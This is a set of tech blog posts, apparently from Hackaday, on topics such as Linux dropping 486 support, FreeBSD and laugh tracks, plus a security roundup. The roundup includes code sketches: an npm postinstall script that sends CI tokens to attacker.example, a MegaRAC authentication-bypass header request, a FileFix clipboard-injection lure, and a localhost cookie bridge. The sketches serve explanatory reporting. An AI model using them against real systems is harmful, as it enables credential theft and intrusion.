If you’re a solo musician, you probably have lots of gear you’d like to control, but you don’t have enough hands. You can enlist your feet, but your gear might not have foot-suitable interfaces as standard. For situations like these, [Nerd Musician] created the OpenMIDIStomper.
The concept is simple enough—the hardy Hammond enclosure contains a bunch of foot switches and ports for external expression pedals. These are all read by an Arduino Pro Micro, which is responsible for turning these inputs into distinct MIDI outputs to control outboard gear or software. It handles this via MIDI over USB. The MIDI commands sent for each button can be configured via a webpage. Once you’ve defined all the messages you want to send, you can export your configuration from the webpage, paste it into the Arduino IDE, and flash it to the device itself.
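For a sense of what the firmware ultimately produces, here’s a minimal sketch, written against the browser’s Web MIDI API rather than the project’s actual Arduino code, of the three-byte Control Change message a single footswitch might emit. The CC number and channel are arbitrary examples, not OpenMIDIStomper defaults.

```typescript
// A hedged sketch of the MIDI side of a footswitch, not the project's firmware.
const access = await navigator.requestMIDIAccess();
const output = [...access.outputs.values()][0]; // first available MIDI output

function stomp(pressed: boolean): void {
  const CHANNEL = 0;    // MIDI channel 1
  const CC_NUMBER = 80; // hypothetical CC assigned to this switch
  // 0xB0 | channel = Control Change status byte, then controller, then value
  output.send([0xb0 | CHANNEL, CC_NUMBER, pressed ? 127 : 0]);
}

stomp(true);  // switch pressed
stomp(false); // switch released
```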
Some time ago, Linus Torvalds made a throwaway comment that sent ripples through the Linux world. Was it perhaps time to abandon support for the now-ancient Intel 486? Developers had already abandoned the 386 in 2012, and Torvalds openly mused whether the time was right to make further cuts for the benefit of modernity.
It would take three long years, but that eventuality finally came to pass. As of version 6.15, the Linux kernel will no longer support chips running the 80486 architecture, along with a gaggle of early “586” chips as well. It’s all down to some housekeeping and specific technical changes that render the new code inoperable on the machines of the past.
Why Won’t It Work Anymore?
The kernel has had a method to emulate the CMPXCHG8B instruction for some time, but that code is now being removed.
The big change is coming about thanks to a patch submitted by Ingo Molnar, a long-time developer on the Linux kernel. The patch slashes support for older pre-Pentium CPUs, including the Intel 486 and a wide swathe of third-party chips that fell in between the 486 and Pentium generations when it came to low-level feature support.
Going forward, Molnar’s patch reconfigures the kernel to require that CPUs have hardware support for the Time Stamp Counter (read via the RDTSC instruction) and the CMPXCHG8B instruction. Both became part of x86 when Intel introduced the very first Pentium processors to the market in the early 1990s. The Time Stamp Counter is relatively easy to understand—a simple 64-bit register that stores the number of cycles executed by the CPU since last reset. As for CMPXCHG8B, it’s used for comparing and exchanging eight bytes of data at a time. Earlier Intel CPUs got by with the narrower CMPXCHG instruction, which handles at most four bytes. The Linux kernel has long carried a piece of code to emulate CMPXCHG8B in order to ease interoperability with older chips that lacked the feature in hardware.
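If the instruction name is opaque, the semantics are simple. Here’s a sketch of what CMPXCHG8B does, with a BigInt standing in for the 8-byte memory operand; the real instruction does all of this atomically in hardware, which is exactly what the kernel had to emulate on older chips.

```typescript
// Sketch of CMPXCHG8B semantics; the CPU does this in one atomic instruction.
function cmpxchg8b(
  mem: { value: bigint }, // the 64-bit memory location
  expected: bigint,       // EDX:EAX on a real CPU
  replacement: bigint     // ECX:EBX on a real CPU
): { swapped: boolean; old: bigint } {
  const old = mem.value;
  if (old === expected) {
    mem.value = replacement; // only written if the comparison succeeds
    return { swapped: true, old };
  }
  return { swapped: false, old }; // caller sees the current value instead
}

// Typical lock-free usage: retry until no other "CPU" raced us.
const counter = { value: 0n };
let seen: bigint;
do {
  seen = counter.value;
} while (!cmpxchg8b(counter, seen, seen + 1n).swapped);
```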
The changes remove around 15,000 lines of code. Deletions include the code that emulated the CMPXCHG8B instruction for processors that lacked it, various software math routines, and the configuration logic that set the kernel up properly for these older, lower-featured CPUs.
Basically, if you try to run Linux kernel 6.15 on a 486 going forward, it’s just not going to work. The kernel will make calls to instructions that the chip has never heard of, and everything will fall over. The same will be true for machines running various non-Pentium “586” chips, like the AMD 5×86 and Cyrix 5×86, as well as the AMD Elan. It’s likely even some later chips, like the Cyrix 6×86, might not work, given their questionable or non-existent support for the CMPXCHG8B instruction.
Why Now?
Molnar’s reasoning for the move was straightforward, as explained in the patch notes:
In the x86 architecture we have various complicated hardware emulation facilities on x86-32 to support ancient 32-bit CPUs that very very few people are using with modern kernels. This compatibility glue is sometimes even causing problems that people spend time to resolve, which time could be spent on other things.
Indeed, it follows on from earlier comments by Torvalds, who had noted how development was being held back by support for the ancient members of Intel’s x86 architecture. In particular, the Linux creator questioned whether modern kernels even still worked on older 486 CPUs, given that various low-level features of the kernel had already begun using instructions like RDTSC that aren’t present on pre-Pentium processors. “Our non-Pentium support is ACTIVELY BUGGY AND BROKEN right now,” Torvalds exclaimed in 2022. “This is not some theoretical issue, but very much a ‘look, ma, this has never been tested, and cannot actually work’ issue, that nobody has ever noticed because nobody really cares.”
Intel kept i486 chips in production for a good 18 years, with the last examples shipped out in September 2007. Credit: Konstantin Lanzet, CC BY-SA 3.0
Basically, the user base for modern kernels on old 486 and early “586” hardware was so small that Torvalds no longer believed anyone was even checking whether up-to-date Linux worked on those platforms anymore. Thus, any further development effort to quash bugs and keep these platforms supported was unjustified.
It’s worth acknowledging that Intel made its last shipments of i486 chips on September 28, 2007. That’s perhaps more recent than you might think for a chip that launched in 1989. However, these chips weren’t for mainstream use. Beyond the early 1990s, the 486 was dead for desktop users, with an IBM spokesperson calling the 486 an “ancient chip” and a “dinosaur” in 1996. Intel’s production continued beyond that point almost solely for the benefit of military, medical, industrial, and other embedded users.
Third-party chips like the AMD Elan will no longer be usable, either. Credit: Phiarc, CC-BY-SA 4.0
If there were a large and vocal community calling for ongoing support for these older processors, the kernel development team might have seen things differently. However, in the month or so that the kernel patch has been public, no such furore has erupted. Indeed, there’s nothing stopping these older machines from still running Linux—they just won’t be able to run the most up-to-date kernels. That’s not such a big deal.
While there are usually security implications around running outdated operating systems, the simple fact is that few to no important 486 systems should really be connected to the Internet anyway. They lack the performance to even load modern websites, and have little spare overhead to run antivirus software or firewalls on top of whatever software is required for their main duties. Operators of such machines won’t be missing much by being stuck on earlier revisions of the kernel.
Ultimately, it’s good to see Linux developers continuing to prune the chaff and improve the kernel for the future. It’s perhaps sad to say goodbye to the 486 and the gaggle of weird almost-Pentiums from other manufacturers, but if we’re honest, few to none were running the most recent Linux kernel anyway. Onwards and upwards!
People have been talking about switching from Windows to Linux since the 1990s, but in the world of open-source operating systems, there is much more variety than just the hundreds of flavors of Linux-based operating systems today. Take FreeBSD, for example. In a recent [GNULectures] video, we get to see a user’s attempt to switch from desktop Linux to desktop FreeBSD.
The interesting thing here is that the two are similar and yet very different, mainly owing to their very different histories, with FreeBSD descending directly from BSD, itself a derivative of the original UNIX. One of the most significant differences is probably that Linux is just a kernel, with (usually) the GNU userland glued on top of it to create GNU/Linux. The GNU and BSD userlands are similar, and yet different, with varying levels of POSIX support. This effectively means that FreeBSD is a single, coherent OS with rather nice documentation (the FreeBSD Handbook).
The basic summary here is that FreeBSD is rather impressive and easy to set up for a desktop, especially if you use a customized version like GhostBSD. Despite Libreboot, laptop power management, OBS NVENC, printer, and WiFi issues, it was noted that none of these are uncommon with GNU/Linux either. Having a single package manager (pkg) for all of FreeBSD (and derivatives) simplifies things a lot. The bhyve hypervisor makes running VMs a snap. A robust ZFS filesystem is also a big plus.
What counts against desktop FreeBSD in the end is a less refined experience in some areas, despite FreeBSD being able to run Linux applications courtesy of binary compatibility. With some developer love and care, FreeBSD might make for a nice desktop alternative to GNU/Linux before long, one that could be tempting even for the die-hard Windows holdouts among us.
The construction is simple enough, attractive in its own way, with a rugged junk-assembly sort of style. The video starts out by demonstrating the use of a piezo element hooked up as a simple contact microphone, before developing it into something more eclectic.
The basic concept: Mount the piezo element to a metal box fitted with a variety of oddball implements. What kind of implements? Spiralled copper wires, a spring, and parts of a whisk. When struck, plucked, or twanged, they conduct vibrations through the box, the microphone picks them up, and the box passes the sound on to other audio equipment.
It might seem frivolous, but it’s got some real value for avant-garde musical experimentation. In particular, if you’re looking for weird signals to feed into your effects rack or modular synth setup, this is a great place to start.
Old hardware tends to get less support as the years go by, from both manufacturers and the open-source community alike. And yet, every now and then, we hear about fresh attention for an ancient device. Consider the ancient SoundBlaster sound card that first hit the market 31 years ago. [Mark] noticed that a recent update squashed a new bug on an old piece of gear.
Jump over to the Linux kernel archive, and you’ll find a pull request for v6.16-rc3 from [Takashi Iwai]. The update featured fixes for a number of sound devices, but one stands out amongst the rest. It’s the SoundBlaster AWE32 ISA sound card, with [Iwai] noting “we still got a bug report after 25 years.” The bug in question appears to have been reported in 2023 by a user running Fedora 39 on a 120 MHz Pentium-based machine.
The fixes themselves are not particularly interesting. They merely concern minutiae about the DMA modes used with the old hardware. The new updates ensure that DMA modes cannot be changed while the AWE32 is playing a PCM audio stream, and that DMA setups are disabled when changing modes. This helps avoid system lockups and/or ugly noises emanating from the output of the soundcard.
It’s incredibly unlikely this update will affect you, unless you’re one of a handful of users still using an ISA soundcard in 2025. Still, if you are — and good on you — you’ll be pleased someone still cares about your user experience. Meanwhile, if you’re aware of any other obscure old-school driver updates going on out there, don’t hesitate to let us know on the tips line. Want to relive your ISA card’s glory days? Plug it into USB.
Earlier this year, I was required to move my server to a different datacenter. The tech that helped handle the logistics suggested I assign one of my public IPs to the server’s Baseboard Management Controller (BMC) port, so I could access the controls there if something went sideways. I passed on the offer, and not only because IPv4 addresses are a scarce commodity these days. No, I’ve never trusted a server’s built-in BMC. For reasons like this MegaOWN of MegaRAC, courtesy of a CVSS 10.0 CVE, under active exploitation in the wild.
This vulnerability was discovered by Eclypsium back in March and it’s a pretty simple authentication bypass, exploited by setting an X-Server-Addr header to the device IP address and adding an extra colon symbol to that string. Send this along inside an HTTP request, and it’s automatically allowed without authentication. This was assigned CVE-2024-54085, and for servers with the BMC accessible from the Internet, it scores that scorching 10.0 CVSS.
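To show just how low the bar is, here’s a sketch of the reported bypass shape; the Redfish path is a placeholder rather than anything from the advisory, and the address is a documentation IP, not a real BMC.

```typescript
// Hedged sketch of the reported MegaRAC auth bypass shape, for understanding.
const bmc = "192.0.2.10"; // documentation address, not a real device

const resp = await fetch(`https://${bmc}/redfish/v1/placeholder`, {
  headers: {
    // Device IP with a trailing colon: per the report, the parser treats
    // this as a trusted internal request and skips authentication.
    "X-Server-Addr": `${bmc}:`,
  },
});
console.log(resp.status); // reportedly 200 on an unpatched BMC
```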
We’re talking about this now, because CISA has added this CVE to the official list of vulnerabilities known to be exploited in the wild. And it’s hardly surprising, as this is a near-trivial vulnerability to exploit, and it’s not particularly challenging to find web interfaces for the MegaRAC devices using tools like Shodan and others.
There’s a particularly ugly scenario that’s likely to play out here: embedded malware. This vulnerability could be chained with others, and the OS running on the BMC itself could be permanently modified. It would be very difficult to disinfect and then verify the integrity of one of these embedded systems, short of physically removing and replacing the flash chip. And malware running from this advantageous position would very nearly have the keys to the kingdom, particularly if the architecture connects the BMC controller over the PCIe bus, which includes Direct Memory Access.
This brings us to the really bad news. These devices are everywhere. The list of hardware that ships with the MegaRAC Redfish UI includes select units from “AMD, Ampere Computing, ASRock, ARM, Fujitsu, Gigabyte, Huawei, Nvidia, Supermicro, and Qualcomm”. Some of these vendors have released patches. But at this point, any of the vulnerable devices on the Internet, still unpatched, should probably be considered compromised.
Patching Isn’t Enough
To drive the point home that a compromised embedded device is hard to fully disinfect, we have the report from [Max van der Horst] at Disclosing.observer, detailing backdoors discovered in various devices, even after the patch was applied.
These tend to hide in PHP code with innocent-looking filenames, or in an Nginx config. This report covers a scan of Citrix hosts, where 2,491 backdoors were discovered, which is far more than had been previously identified. Installing the patch doesn’t always mitigate the compromise.
VSCode
Many of us have found VSCode to be an outstanding IDE, and the fact that it’s Open Source and cross-platform makes it perfect for programmers around the world. Except for the telemetry, which is built into the official Microsoft builds. It’s Open Source, so the natural reaction from the community is to rebuild the source, and offer builds that don’t have telemetry included. We have fun names like VSCodium and Cursor for these rebuilds. Kudos to Microsoft for making VSCode Open Source so this is possible.
There is, however, a catch, in the form of the extension marketplace. Only official VSCode builds are allowed to pull extensions from the marketplace. As would be expected, the community has risen to the challenge, and one of the marketplace alternatives is Open VSX. And this week, we have the story of how a bug in the Open VSX publishing code could have been a really big problem.
When developers are happy with their work, and are ready to cut a release, how does that actually work? Basically every project uses some degree of automation to make releases happen. For highly automated projects, it’s just a single manual action — a kick-off of a Continuous Integration (CI) run — that builds and publishes the new release. Open VSX supports this sort of approach, and in fact runs a nightly GitHub Action to iterate through the list of extensions, and pull any updates that are advertised.
VS Code extensions are Node.js projects, and are built using npm. So the workflow clones the repository, and runs npm install to generate the installable packages. Running npm install does carry the danger that arbitrary code runs inside the build scripts. How bad would it be for malicious code to run inside this nightly update action, on the Open VSX GitHub repository?
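Quite bad, potentially. Any dependency can declare a lifecycle script in its package.json, something like "scripts": { "postinstall": "node evil.js" }, and npm will happily execute it during install. As a hedged sketch, with a hypothetical token variable name, the hostile script could be as small as this:

```typescript
// Sketch of a malicious npm lifecycle script; names here are hypothetical.
import { request } from "node:https";

const stolen = JSON.stringify({
  token: process.env.SUPER_ADMIN_TOKEN ?? "", // CI secrets live in env vars
  repo: process.env.GITHUB_REPOSITORY ?? "",
});

// Exfiltrate to an attacker-controlled host (placeholder domain).
const req = request(
  { host: "attacker.example", method: "POST", path: "/collect" },
  () => {}
);
req.end(stolen);
```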
A super-admin token was available as an environment variable inside this GitHub Action, which, if exfiltrated, would have allowed complete takeover of the Open VSX repository and unfettered access to the software contained therein. There’s no evidence that this vulnerability was found or exploited, and Open VSX and Koi Security worked together to mitigate it, with the patch landing about a month and a half after first disclosure.
FileFix
There’s a new social engineering attack on the web, FileFix. It’s a very simple, nearly dumb idea. By that I mean, a reader of this column would almost certainly never fall for it, because FileFix asks the user to do something really unusual. You get an email or land on a bad website, and it appears to present a document for you. To access this doc, just follow the steps: copy this path, open your File Explorer, and paste the path. Easy! The website even gives you a button to click to launch File Explorer.
That button actually launches a file upload dialog, but that’s not even the clever part. This attack takes advantage of two quirks. The first is that JavaScript can inject arbitrary strings into the paste buffer, and the second is that system commands can be run from the Windows Explorer address bar. So yes, copy that string, paste it into the bar, and it can execute a command. So while it’s a dumb attack, and asks the user to do something very weird, it’s also a very clever intersection between a couple of quirky behaviors, and users will absolutely fall for this.
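Here’s a sketch of the paste-buffer half of the trick, with a harmless placeholder where a real lure would put a live command:

```typescript
// Sketch of clipboard injection: the "copy path" button puts an
// attacker-chosen string on the clipboard, not the path the victim sees.
const fakePath = "C:\\Company\\Reports\\Q3.pdf";
// A real lure pads spaces so only the fake path shows when pasted;
// the command here is a harmless placeholder.
const payload =
  'powershell -c "echo pwned" ' + " ".repeat(120) + "# " + fakePath;

document.querySelector("#copy-button")?.addEventListener("click", async () => {
  // The victim believes they copied fakePath; they actually copied payload.
  await navigator.clipboard.writeText(payload);
});
```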
eMMC Data Extraction
The embedded MultiMediaCard (eMMC) is a popular option for flash storage on embedded devices. And Zero Day Initiative has a fascinating look into what it takes to pull data from an eMMC chip in-situ. An 8-leg EEPROM is pretty simple to desolder or probe, but the ball grid array of an eMMC is beyond the reach of mere mortals. If your soldering skills aren’t up to the task, there’s still hope to get that data off. The only connections needed are power, reference voltage, clock, a command line, and the data lines. If you can figure out connection points for all of those, you can probably power the chip and talk to it.
One challenge is keeping the rest of the system from booting up and getting chatty. There’s a clever idea: look for a reset pin on the MCU, and just hold it active while you work, keeping the MCU in a reset, and quiet, state. Another fun idea is to just remove the system’s oscillator, as the MCU may depend on it to boot and do anything.
Bits and Bytes
What would you do with 40,000 alarm clocks? That’s the question unintentionally faced by [Ian Kilgore], when he discovered that the Loftie wireless alarm clock works over unsecured MQTT. On the plus side, he got Home Assistant integration working.
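For the curious, “unsecured MQTT” means anyone who can reach the broker can subscribe to everything. A sketch with the Node mqtt package, using made-up hostname and topic names rather than Loftie’s actual ones:

```typescript
// Sketch of listening in on an unsecured MQTT broker; names are hypothetical.
import mqtt from "mqtt";

const client = mqtt.connect("mqtt://broker.example:1883"); // no credentials needed

client.on("connect", () => {
  client.subscribe("clocks/+/alarm"); // + wildcard: every clock at once
});

client.on("message", (topic, payload) => {
  console.log(`${topic}: ${payload.toString()}`); // alarm state, clock by clock
});
```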
What does it look like when an attack gets launched against a big cloud vendor? The folks at Cloud-IAM pull the curtain back just a bit, and talk about an issue that almost allowed an enumeration attack to become an effective DDoS. They found the attack and patched their code, at which point it turned into a DDoS race, one that Cloud-IAM managed to win.
The Wire secure communication platform recently got a good hard look from the Almond security team. And while the platform seems to have passed with good grades, there are a few quirks around file sharing that you might want to keep in mind. For instance, when a shared file is deleted, the backing files aren’t deleted, just the encryption keys. And the UUID on those files serves as the only authentication mechanism. None of the issues found rise to the level of vulnerabilities, but it’s good to know.
To paraphrase an old joke: How do you know if someone is a Rust developer? Don’t worry, they’ll tell you. There is a move to put Rust everywhere, even in the Linux kernel. Not going fast enough for you? Then check out Asterinas — an effort to create a Linux-compatible kernel totally in Rust.
The goal is to improve memory safety and, to that end, the project describes what it calls a “framekernel.” Historically, kernels have been either monolithic, with everything in one piece, or built on a microkernel architecture, where a minimal core loads and most services run as separate pieces.
A framekernel is similar to a microkernel, but everything shares a single address space, and the services outside the core framework are not allowed to use “unsafe” Rust. This minimizes the amount of code that, in theory, could break memory safety. If you want to know more, there is impressive documentation. You can find the code on GitHub.
Will it work? It is certainly possible. Is it worth it? Time will tell. Our experience is that no matter how many safeguards you put on code, there’s no cure-all that prevents bad programming. Of course, to take the contrary argument, seat belts don’t stop all traffic fatalities, and you could just choose not to have accidents, yet we still wear seat belts. If Rust can prevent some mistakes or malicious intent, maybe it’s worth it even if it isn’t perfect.
I ran into an old episode of Hogan’s Heroes the other day that struck me as odd. It didn’t have a laugh track. Ironically, the show was one where two pilots were shown, one with and one without a laugh track. The resulting data ensured future shows would have fake laughter. This wasn’t the pilot, though, so I think it was just an error on the part of the streaming service.
However, it was very odd. Many of the jokes didn’t come off as funny without the laugh track. Many of them came off as cruel. That got me to thinking about how they had to put laughter in these shows to begin with. I had my suspicions, but was I ever way off!
Well, to be honest, my suspicions were well-founded if you go back far enough. Bing Crosby was tired of running two live broadcasts, one for each coast, so he invested in tape recording, using German recorders Jack Mullin had brought back after World War II. Apparently, one week, Crosby’s guest was a comic named Bob Burns. He told some off-color stories, and the audience was howling. Of course, none of that would make it on the air in those days. But they saved the recording.
A few weeks later, either a bit of the show wasn’t as funny or the audience was in a bad mood. So they spliced in some of the laughs from the Burns performance. You can probably guess what happened next, and that’s the apparent birth of the laugh track. But that method didn’t last long before someone — Charley Douglass — came up with something better.
Sweetening
The problem with a studio audience is that they might not laugh at the right times. Or at all. Or they might laugh too much, too loudly, or too long. Charley Douglass developed techniques for sweetening an audio track — adding laughter, or desweetening by muting or cutting live laughter. At first, this was laborious, but Douglass had a plan.
He built a prototype machine around a 28-inch wooden wheel with tape glued to its perimeter. The tape held the laughter recordings, and a mechanical detent system controlled how much of it played back.
Douglass decided to leave CBS, but the prototype belonged to them. However, the machine didn’t last very long without his attention. In 1953, he built his own derivative version and populated it with laughter from The Red Skelton Show, taken from segments where Red did pantomime, and, thus, there was no audio but the laughter and applause.
Do You Really Need It?
There is a lot of debate regarding fake laughter. On the one hand, it does seem to help. On the other hand, shouldn’t people just — you know — laugh when something’s funny?
There was concern, for example, that The Munsters would be scary without a laugh track. As I mentioned earlier, some of the gags on Hogan’s Heroes are fine with laughter, but seem mean-spirited without.
Consider The Big Bang Theory. If you watch a clip (below) with no laugh track, you’ll notice two things. First, it does seem a bit mean (as a commenter said: “…like a bunch of people who really hate each other…”). The other thing you’ll notice is that the actors pause for the laugh track insertion, which, when there is no laughter, comes off as really weird.
Laugh Monopoly
Laugh tracks became very common on single-camera shows, which were hard to film in front of an audience because they weren’t shot in sequence. Even so, some directors didn’t approve of “mechanical tricks” and refused to use fake laughter.
Even multiple-camera shows would sometimes want to augment a weak audience reaction or even just replace laughter to make editing less noticeable. Soon, producers realized that they could do away with the audience and just use canned laughter. Douglass was essentially the only game in town, at least in the United States.
The Douglass device was used on virtually every laugh-tracked show from the 1950s through the 1970s. Andy Griffith? Yep. Bewitched? Sure. The Brady Bunch? Of course. Even The Munsters had Douglass or one of his family members creating their laugh tracks.
One reason he stayed a monopoly is that he was extremely secretive about how he did his work. In 1960, he formed Northridge Electronics out of a garage. When called upon, he’d wheel his invention into a studio’s editing room and add laughs for them. No one was allowed to watch.
You can see the original “laff box” in the videos below.
The device was securely locked, but we now know that inside, the machine had 32 tape loops, each with ten laugh tracks. Typewriter-like keys allowed you to select various laughs and control their duration and intensity.
In the background, there was always a titter track of people mildly laughing that could be made more or less prominent. There were also some other sound effects like clapping or people moving in seats.
Building a laugh track involved mixing samples from different tracks and modulating their amplitude. You can imagine it was like playing a musical instrument that emits laughter.
Before you tell us, yes, there seems to be some kind of modern interface board on the top in the second video. No, we don’t know what it is for, but we’re sure it isn’t part of the original machine.
Of course, all things end. As technology got better and tastes changed, some companies — notably animation companies — made their own laugh tracks. One of Douglass’ protégés started a company, Sound One, that used better technology to create laughter, including stereo recordings and cassette tapes.
Today, laugh tracks are not everywhere, but you can still find them and, of course, they are prevalent in reruns. The next time you hear one, you’ll know the history behind that giggle.
During Apple’s late-90s struggles with profitability, it made a few overtures toward licensing its software to other computer manufacturers, while at the same time trying to modernize its operating system, which was threatening to slip behind Windows. While Apple eventually scrapped its licensing plans, an interesting product of the situation was Rhapsody OS. Although Apple was still building PowerPC computers, Rhapsody also had compatibility with Intel processors, which [Omores] put to good use by running it on a relatively modern i7-3770 CPU.
[Omores] selected a Gigabyte GA-Z68A-D3-B3 motherboard because it supports IDE emulation for SATA drives, which Rhapsody requires. The operating system installer needs to run from two floppy disks, one for boot and one for drivers. The Gigabyte motherboard doesn’t support a floppy disk drive, so [Omores] used an older Asus P5E motherboard with a floppy drive to install Rhapsody onto an SSD, then transferred the SSD to the Gigabyte board. The installer initially hit a kernel panic caused by finding too much memory available. Limiting the physical RAM available to the OS by setting the maxmem value solved the issue.
After this, the graphical installation went fairly smoothly. A serial mouse was essential here, since Rhapsody doesn’t support USB. It detected the video card immediately, and eventually worked with one of [Omores]’s ethernet cards. [Omores] also took a brief look at Rhapsody’s interface. By default, there were no graphical programs for web browsing, decompressing files, or installing programs, so some command line work was necessary to install applications. Of course, the highlight of the video was the installation of a Doom port (RhapsoDoom).
Are robotaxis poised to be the Next Big Thing in North America? It seems so, at least according to Goldman Sachs, which issued a report this week stating that robotaxis have officially entered the commercialization phase of the hype cycle. That assessment appears to be based on an analysis of the total ride-sharing market, which encompasses services that are currently almost 100% reliant on meat-based drivers, such as Lyft and Uber, and is valued at $58 billion. Autonomous ride-hailing services like Waymo, which has a fleet of 1,500 robotaxis operating in several cities across the US, are included in that market but account for less than 1% of the total right now. But, Goldman projects that the market will burgeon to over $336 billion in the next five years, driven in large part by “hyperscaling” of autonomous vehicles.
We suspect the upcoming launch of Tesla’s robotaxis in Austin, Texas, accounts for some of this enthusiasm for the near-term, but we have our doubts that a market based on such new and complex technologies can scale that quickly. A little back-of-the-envelope math suggests that the robotaxi fleet will need to grow to about 9,000 cars in the next five years, assuming the same proportion of autonomous cars in the total ride-sharing fleet as exists today. A look inside the Waymo robotaxi plant outside of Phoenix reveals that it can currently only convert “several” Jaguar electric SUVs per day, meaning they’ve got a lot of work to do to meet the needed numbers. Other manufacturers will no doubt pitch in, especially Tesla, and factory automation always seems to pull off miracles under difficult circumstances, but it still seems like a stretch to think there’ll be that many robotaxis on the road in only five years. Also, it currently costs more to hail a robotaxi than an Uber or Lyft, and we just don’t see why anyone would prefer to call a robotaxi, unless it’s for the novelty of the experience.
On the other hand, if the autonomous ride-sharing market does experience explosive growth, there could be knock-on benefits even for Luddite naysayers such as we. A report, again from Goldman Sachs — hey, they probably have a lot of skin in the game — predicts that auto insurance rates could fall by 50% as more autonomous cars hit the streets. This is based on markedly lower liability for self-driving cars, which have 92% fewer bodily injury claims and 88% lower property damage claims than human-driven cars. Granted, those numbers have to be based on a very limited population, and we guarantee that self-drivers will find new and interesting ways to screw up on the road. But if our insurance rates fall even a little because of self-driving cars, we’ll take it as a win.
Speaking of robotics, if you want to see just how far we’ve come in terms of robot dexterity, look no further than the package-sorting abilities of Figure’s Helix robot. The video in the article is an hour long, but you don’t need to watch more than a few minutes to be thoroughly impressed. The robot is standing at a sorting table with an infeed conveyor loaded with just about the worst parcels possible, a mix of soft, floppy, poly-bagged packages, flat envelopes, and traditional boxes. The robot was tasked with placing the parcels on an outfeed conveyor, barcode-side down, and with proper separation between packages. It also treats the soft poly-bag parcels to a bit of extra attention, pressing them down a bit to flatten them before flicking them onto the belt. Actually, it’s that flicking action that seems the most human, since it’s accompanied by a head-swivel to the infeed belt to select its next package. Assuming this is legitimately autonomous rather than covertly teleoperated, and we have no reason to suspect otherwise, the manual dexterity on display here is next-level; we’re especially charmed by the carefree little package flip about a minute in. The way it handles mistakenly grabbing two packages at once is pretty amazing, too.
And finally, our friend Leo Fernekes dropped a new video that’ll hit close to home for a lot of you out there. Leo is a bit of a techno-hoarder, you see, and with the need to make some room at home and maintain his domestic tranquility, he had to tackle the difficult process of getting rid of old projects, some of which date back 40 or more years. Aside from the fun look through his back-catalog of projects, the video is also an examination of the emotional attachments we hackers tend to develop to our projects. We touched on that a bit in our article on tech anthropomorphization, but we see how going through these projects is not only a snapshot of the state of the technology available at the time, but also a slice of life. Each of the projects is not just a collection of parts, they’re collections of memories of where Leo was in life at the time. Sometimes it’s hard to let go of things that are so strongly symbolic of a time that’s never coming back, and we applaud Leo for having the strength to pitch that stuff. Although seeing a clock filled with 80s TTL chips and a vintage 8085 microprocessor go into the bin was a little tough to watch.
Facebook and Yandex have been caught performing user-hostile tracking. This sort of makes today just another Friday, but this is a bit special. This time, it’s Local Mess. OK, it’s an attack with a dorky name, but very clever. The short explanation is that web sites can open connections to localhost. And on Android, apps can be listening to those ports, allowing web pages to talk to apps.
That may not sound too terrible, but there are a couple of things to be aware of. First, Android (and iOS) apps are sandboxed — intentionally making it difficult for one app to talk to another, except in ways approved by the OS maker. The browser is similarly sandboxed away from the apps. This is a security boundary, and it is an especially important one when the user is in incognito mode.
The tracking pixel is important to explain here. This is a snippet of code that puts an invisible image on a website, and as a result allows the tracker to run JavaScript in your browser in the context of that site. Facebook is famous for this, but it is not the only advertising service that tracks users in this way. If you’ve searched for an item on one site, and then suddenly been bombarded with ads for that item on other sites, you’ve been tracked by the pixel.
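At its simplest, a pixel is just a script-inserted invisible image whose URL carries the page context back to the tracker. A sketch, with a placeholder tracker domain:

```typescript
// Sketch of a bare-bones tracking pixel; real ones ship cookies and far
// richer context along with the request.
const px = new Image(1, 1);
px.style.display = "none";
px.src =
  "https://tracker.example/pixel?page=" +
  encodeURIComponent(location.href) +
  "&t=" + Date.now(); // cache-buster so every view is reported
document.body.appendChild(px);
```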
This is most useful when a user is logged in, but on a mobile device, the user is much more likely to be logged in on an app and not the browser. The constant pressure for more and better data led to a novel and completely unethical solution. On Android, applications with permission to access the Internet can listen on localhost (127.0.0.1) on unprivileged ports, those above 1024.
Facebook abused this quirk by opening a WebRTC connection to localhost, aimed at one of the ports the Facebook app was listening on. Establishing that connection starts with sending a STUN packet, a UDP tool for NAT traversal. Packed into that STUN packet is the contents of a Facebook cookie, which the Facebook app happily forwards up to Facebook. The browser also sends that cookie to Facebook when loading the pixel, and boom, Facebook knows what website you’re on. Even if you’re not logged in, or incognito mode is turned on.
Yandex has been doing something similar since 2017, though with a different, simpler mechanism. Rather than call localhost directly, Yandex just sets aside yandexmetrica.com for this purpose, with the domain pointing to 127.0.0.1. This was just used to open an HTTP connection to the native Yandex apps, which passed the data up to Yandex over HTTPS. Meta apps were first seen using this trick in September 2024, though it’s very possible it was in use earlier.
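Of the two mechanisms, the Yandex-style one is almost embarrassingly simple to sketch; the port, path, and parameter below are hypothetical:

```typescript
// Sketch of the simpler localhost bridge: an ordinary HTTP request to a
// domain that resolves to 127.0.0.1, where the native app is listening.
fetch(
  "http://yandexmetrica.com:30103/bridge?c=" +
    encodeURIComponent(document.cookie)
)
  .then((r) => r.text())
  .then((deviceId) => {
    // The app answers with identifiers only it knows, welding the
    // browser session to the logged-in app account.
    console.log("bridged identity:", deviceId);
  })
  .catch(() => {
    /* app not installed: no bridge, no tracking bonus */
  });
```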
Both companies have ceased the practice since this report was released. What’s interesting is that this is a flagrant violation of the GDPR and CCPA, and will likely lead to record-setting fines, at least for Facebook.
What’s your Number?
An experiment to see which Google sites still worked with JavaScript disabled led to a fun discovery about how to sidestep rate limiting and find any Google user’s phone number. Google has deployed defensive solutions to prevent attackers from abusing endpoints like accounts.google.com/signin/usernamerecovery. That particular endpoint still works without JS, but it also detects rapid-fire attempts and throws a captcha at anyone trying to brute-force it.
This is intended to work by JS in your browser performing a minor proof-of-work calculation and then sending in a bgRequest token. On the no-JavaScript version of the site, that field was instead set to js_disabled. What happens if you simply take that valid token and stuff it into your scripted request? Profit! This unintended combination bypassed rate limiting, and meant a phone number was trivially discoverable from just a user’s first and last names. It was mitigated in just over a month, and [brutecat] earned a nice $5,000 for the effort.
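The bypass shape, sketched below; apart from the bgRequest field and its js_disabled value, which come from the write-up, the form fields here are hypothetical, and the hole has since been closed.

```typescript
// Sketch of replaying the no-JS form with the magic token value.
const resp = await fetch(
  "https://accounts.google.com/signin/usernamerecovery",
  {
    method: "POST",
    headers: { "Content-Type": "application/x-www-form-urlencoded" },
    body: new URLSearchParams({
      bgRequest: "js_disabled", // skipped the proof-of-work token check
      challenge: "first-and-last-name-guess", // placeholder field name
    }),
  }
);
console.log(resp.status); // no captcha, no rate limit, pre-mitigation
```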
Kerberos Reflection
